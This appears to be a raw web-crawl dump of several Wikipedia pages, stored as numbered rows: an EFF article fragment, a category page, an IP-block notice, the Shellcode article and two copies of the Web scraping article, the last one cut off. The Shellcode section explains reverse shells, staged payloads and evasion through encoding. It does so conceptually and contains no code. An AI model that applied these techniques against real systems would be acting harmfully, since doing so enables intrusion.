James Patrick Kelly, Ramez Naam, Annalee Newitz, Hannu Rajaniemi, Rudy Rucker, Lewis Shiner, Bruce Sterling, and Charles Yu. 46 non-primary source needed The Electronic Frontier Foundation's blog, DeepLinks, is a major section of its main website at EFF.org. non-primary source needed The EFF sent a video message of support to global grassroots movement CryptoParty. 47 non-primary source needed EFF's How to Fix the Internet podcast won a 2024 Anthem Award. 48 The EFF has developed some software and browser add-ons, including Switzerland, HTTPS Everywhere, and Privacy Badger. citation needed The EFF conducted a project named Secure Messaging Scorecard which "evaluated apps and tools based on a set of seven specific criteria ranging from whether messages were encrypted in transit to whether or not the code had been recently audited. 49 non-primary source needed As of April 21, 2017 update , a revised version is under development. 49 non-primary source needed As of 2021, Charity Navigator has given the EFF an overall rating of four out of four stars, including four stars for its financial efficiency and capacity. 50 In 2011, the EFF received $1 million from Google as part of a settlement of a class action related to privacy issues involving Google Buzz. The Electronic Privacy Information Center and seven other privacy-focused nonprofits protested that the plaintiffs' lawyers and Google had, in effect, arranged to give the majority of those funds "to organizations that are currently paid by Google to lobby for or to consult for the company". An additional $1 million was obtained from Facebook in a similar settlement. 51 The agitprop art group Psychological Industries has independently issued buttons with pop culture tropes such as the logo of the Laughing Man from the anime series Ghost in the Shell: Stand Alone Complex (with the original The Catcher in the Rye quotation replaced with the slogan of Anonymous), a bleeding roller derby jammer, and the "We Can Do It woman (often misidentified as Rosie the Riveter) on a series of buttons on behalf of the EFF. 52 In late June 2014 the EFF flew a GEFA-FLUG AS 105 GD 4 53 blimp owned by, and in conjunction with, Greenpeace over the NSA's Bluffdale-based Utah Data Center in protest against its purported illegal spying. 54 |
523 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:All_articles_needing_additional_references | This category contains all pages labeled with Refimprove , Refimprovesect , One source and Unreferenced section and exists primarily for bot-based monitoring of articles which need additional sources. By-month categories are located in Category:Articles needing additional references. This category has the following 4 subcategories, out of 4 total. The following 200 pages are in this category, out of approximately 461,650 total. This list may not reflect recent changes. |
524 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Pages transcluded onto the current version of this page (help): Return to Web scraping. |
525 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Shellcode | In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. 1 However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code. When creating shellcode, it is generally desirable to make it both small and executable, which allows it to be used in as wide a variety of situations as possible. 2 In assembly code, the same function can be performed in a multitude of ways and there is some variety in the lengths of opcodes that can be used for this purpose; good shellcode writers can put these small opcodes to use to create more compact shellcode. 3 Some have reached the smallest possible size while maintaining stability. 4 Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote). Local shellcode is used by an attacker who has limited access to a machine but can exploit a vulnerability, for example a buffer overflow, in a higher-privileged process on that machine. If successfully executed, the shellcode will provide the attacker access to the machine with the same higher privileges as the targeted process. Remote shellcode is used when an attacker wants to target a vulnerable process running on another machine on a local network, intranet, or a remote network. If successfully executed, the shellcode can provide the attacker access to the target machine across the network. Remote shellcodes normally use standard TCP IP socket connections to allow the attacker access to the shell on the target machine. Such shellcode can be categorized based on how this connection is set up: if the shellcode establishes the connection it is called a "reverse shell", or a connect-back shellcode because the shellcode connects back to the attacker's machine. On the other hand, if the attacker establishes the connection, the shellcode is called a bindshell because the shellcode binds to a certain port on the victim's machine. There's a peculiar shellcode named bindshell random port that skips the binding part and listens on a random port made available by the operating system. Because of that, the bindshell random port became the smallest stable bindshell shellcode for x86 64 available to this date. A third, much less common type, is socket-reuse shellcode. This type of shellcode is sometimes used when an exploit establishes a connection to the vulnerable process that is not closed before the shellcode is run. The shellcode can then re-use this connection to communicate with the attacker. Socket re-using shellcode is more elaborate, since the shellcode needs to find out which connection to re-use and the machine may have many connections open. 5 A firewall can be used to detect outgoing connections made by connect-back shellcode as well as incoming connections made by bindshells. They can, therefore, offer some protection against an attacker, even if the system is vulnerable, by preventing the attacker from connecting to the shell created by the shellcode. One reason why socket re-using shellcode is sometimes used is that it does not create new connections and, therefore, is harder to detect and block. Download and execute is a type of remote shellcode that downloads and executes some form of malware on the target system. This type of shellcode does not spawn a shell, but rather instructs the machine to download a certain executable file off the network, save it to disk and execute it. Nowadays, it is commonly used in drive-by download attacks, where a victim visits a malicious webpage that in turn attempts to run such a download and execute shellcode in order to install software on the victim's machine. A variation of this type of shellcode downloads and loads a library. 6 7 Advantages of this technique are that the code can be smaller, that it does not require the shellcode to spawn a new process on the target system, and that the shellcode does not need code to clean up the targeted process as this can be done by the library loaded into the process. When the amount of data that an attacker can inject into the target process is too limited to execute useful shellcode directly, it may be possible to execute it in stages. First, a small piece of shellcode (stage 1) is executed. This code then downloads a larger piece of shellcode (stage 2) into the process's memory and executes it. This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process but cannot determine where in the process it will end up. Small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process's address space for the larger shellcode (the egg) and executes it. 8 This type of shellcode is similar to egg-hunt shellcode, but looks for multiple small blocks of data (eggs) and recombines them into one larger block (the omelette) that is subsequently executed. This is used when an attacker can only inject a number of small blocks of data into the process. 9 An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits. Because most processes filter or restrict the data that can be injected, shellcode often needs to be written to allow for these restrictions. This includes making the code small, null-free or alphanumeric. Various solutions have been found to get around such restrictions, including: Since intrusion detection can detect signatures of simple shellcodes being sent over the network, it is often encoded, made self-decrypting or polymorphic to avoid detection. Exploits that target browsers commonly encode shellcode in a JavaScript string using percent-encoding, escape sequence encoding uXXXX" or entity encoding. 10 Some exploits also obfuscate the encoded shellcode string further to prevent detection by IDS. For example, on the IA 32 architecture, here's how two NOP (no-operation) instructions would look, first unencoded: This instruction is used in NOP slides. Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When a null-terminated string is copied, it will be copied up to and including the first null but subsequent bytes of the shellcode will not be processed. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it incapable of running successfully. To produce null-free shellcode from shellcode that contains null bytes, one can substitute machine instructions that contain zeroes with instructions that have the same effect but are free of nulls. For example, on the IA 32 architecture one could replace this instruction: which contains zeroes as part of the literal (1 expands to 0x00000001) with these instructions: which have the same effect but take fewer bytes to encode and are free of nulls. An alphanumeric shellcode is a shellcode that consists of or assembles itself on execution into entirely alphanumeric ASCII or Unicode characters such as 0 9, A Z and a z. 11 12 This type of encoding was created by hackers to hide working machine code inside what appears to be text. This can be useful to avoid detection of the code and to allow the code to pass through filters that scrub non-alphanumeric characters from strings (in part, such filters were a response to non-alphanumeric shellcode exploits). A similar type of encoding is called printable code and uses all printable characters (0 9, A Z, a z, () etc.). A similarly restricted variant is ECHOable code not containing any characters which are not accepted by the ECHO command. It has been shown that it is possible to create shellcode that looks like normal text in English. 13 Writing alphanumeric or printable code requires good understanding of the instruction set architecture of the machine(s) on which the code is to be executed. It has been demonstrated that it is possible to write alphanumeric code that is executable on more than one machine, 14 thereby constituting multi-architecture executable code. In certain circumstances, a target process will filter any byte from the injected shellcode that is not a printable or alphanumeric character. Under such circumstances, the range of instructions that can be used to write a shellcode becomes very limited. A solution to this problem was published by Rix in Phrack 57 11 in which he showed it was possible to turn any code into alphanumeric code. A technique often used is to create self-modifying code, because this allows the code to modify its own bytes to include bytes outside of the normally allowed range, thereby expanding the range of instructions it can use. Using this trick, a self-modifying decoder can be created that initially uses only bytes in the allowed range. The main code of the shellcode is encoded, also only using bytes in the allowed range. When the output shellcode is run, the decoder can modify its own code to be able to use any instruction it requires to function properly and then continues to decode the original shellcode. After decoding the shellcode the decoder transfers control to it, so it can be executed as normal. It has been shown that it is possible to create arbitrarily complex shellcode that looks like normal text in English. 13 Modern programs use Unicode strings to allow internationalization of text. Often, these programs will convert incoming ASCII strings to Unicode before processing them. Unicode strings encoded in UTF 16 use two bytes to encode each character (or four bytes for some special characters). When an ASCII (Latin 1 in general) string is transformed into UTF 16, a zero byte is inserted after each byte in the original string. Obscou proved in Phrack 61 12 that it is possible to write shellcode that can run successfully after this transformation. Programs that can automatically encode any shellcode into alphanumeric UTF 16 proof shellcode exist, based on the same principle of a small self-modifying decoder that decodes the original shellcode. Most shellcode is written in machine code because of the low level at which the vulnerability being exploited gives an attacker access to the process. Shellcode is therefore often created to target one specific combination of processor, operating system and service pack, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors. 15 16 17 Such versatility is commonly achieved by creating multiple versions of the shellcode that target the various platforms and creating a header that branches to the correct version for the platform the code is running on. When executed, the code behaves differently for different platforms and executes the right part of the shellcode for the platform it is running on. Shellcode cannot be executed directly. In order to analyze what a shellcode attempts to do it must be loaded into another process. One common analysis technique is to write a small C program which holds the shellcode as a byte buffer, and then use a function pointer or use inline assembler to transfer execution to it. Another technique is to use an online tool, such as shellcode 2 exe, to embed the shellcode into a pre-made executable husk which can then be analyzed in a standard debugger. Specialized shellcode analysis tools also exist, such as the iDefense sclog project which was originally released in 2005 as part of the Malcode Analyst Pack. Sclog is designed to load external shellcode files and execute them within an API logging framework. Emulation-based shellcode analysis tools also exist such as the sctest application which is part of the cross-platform libemu package. Another emulation-based shellcode analysis tool, built around the libemu library, is scdbg which includes a basic debug shell and integrated reporting features. |
526 | https://en.wikipedia.org/wiki/Data_scraping | https://zh-yue.wikipedia.org/wiki/%E6%95%B8%E6%93%9A%E5%88%AE%E5%8F%96 | data scraping |
527 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-impervawp2011-14 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
528 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-5 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also 